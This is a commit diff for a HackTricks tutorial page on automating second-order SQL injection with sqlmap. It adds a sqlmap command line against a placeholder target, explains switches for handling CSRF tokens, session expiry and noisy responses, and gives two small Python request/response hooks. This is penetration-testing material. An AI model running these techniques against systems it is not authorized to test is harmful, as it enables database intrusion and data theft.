Skip to content

Commit f1deb01

Browse files
author
HackTricks News Bot
committed
Add content from: Research Update Enhanced src/pentesting-web/sql-injection/sq...
1 parent 9aabce5 commit f1deb01

1 file changed

Lines changed: 62 additions & 1 deletion

File tree

src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md

Lines changed: 62 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -78,7 +78,68 @@ sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy
7878
# -a : Dump all
7979
```
8080

81-
{{#include ../../../banners/hacktricks-training.md}}
81+
## Useful switches in real second-order flows
82+
83+
Second-order automation usually fails because the **payload storage request works**, but the **execution request is noisy, stateful, or protected**. When that happens, the following flags are usually more useful than adding more payloads:
84+
85+
```bash
86+
sqlmap -r login.txt -p email \
87+
--second-req second.txt \
88+
--csrf-token csrf \
89+
--csrf-url https://target.tld/profile \
90+
--csrf-method POST \
91+
--live-cookies cookies.txt \
92+
--safe-req keepalive.txt \
93+
--safe-freq 1 \
94+
--string "Welcome back" \
95+
--text-only
96+
```
97+
98+
- `--csrf-token`, `--csrf-url`, `--csrf-method`: Useful when the store or trigger request needs a fresh anti-CSRF token on every attempt.
99+
- `--live-cookies`: Reload cookies before each request. Useful when a browser/Burp macro is refreshing session state in the background.
100+
- `--safe-req` and `--safe-freq`: Keep the workflow alive when the application logs you out or invalidates the session after a few failed probes.
101+
- `--string`, `--not-string`, `--regexp`, `--code`, `--text-only`: Useful when the second-order response contains banners, ads, timestamps, or user-generated junk that makes diffing unstable.
102+
103+
## When `--tamper` is not enough
82104

105+
`tamper.py` is still the easiest way to **register a payload, log out, log in again, and trigger execution**. However, on modern targets it is often cleaner to move some of the logic to **request/response hooks**:
106+
107+
- `--preprocess`: Modify the full HTTP request before it is sent. Useful when a second-order flow needs an extra nonce, an extra parameter, or header normalization.
108+
- `--postprocess`: Clean the HTTP response before sqlmap compares it. Useful when the second-order sink is wrapped in dynamic HTML and only a small fragment is stable.
109+
110+
Example request/response hooks:
111+
112+
```python
113+
#!/usr/bin/env python
114+
def preprocess(req):
115+
if req.data:
116+
req.data += b"&preview=1"
117+
```
83118

119+
```python
120+
#!/usr/bin/env python
121+
import re
122+
def postprocess(page, headers=None, code=None):
123+
page = re.sub(br"<span>Generated at .*?</span>", b"", page or b"")
124+
return page, headers, code
125+
```
126+
127+
## Important limitations
128+
129+
- Do **not assume** that `--second-req` will replay the same payload inside a `*` placeholder in the second request. If the trigger request also needs the injected value (or a derived version of it), a custom `tamper`, `--preprocess`, or a local proxy is usually required.
130+
- Do **not rely on** `--eval` for the second request. Official usage documents `--eval` for the primary request flow; if the second request also needs per-attempt mutations, handle them inside your helper scripts instead.
131+
132+
This pattern is especially useful when the payload is stored in places such as:
133+
134+
- Filenames or image metadata that are queried later
135+
- Registration/profile fields later consumed by admin panels
136+
- Sorting/filtering preferences saved server-side and replayed later
137+
- Workflow state that is only executed after a preview, export, or moderation action
138+
139+
## References
140+
141+
- [sqlmap official usage wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage)
142+
- [Second Order SQLi: Automating with sqlmap](https://jlajara.gitlab.io/Second_order_sqli)
143+
144+
{{#include ../../../banners/hacktricks-training.md}}
84145

0 commit comments

Comments
 (0)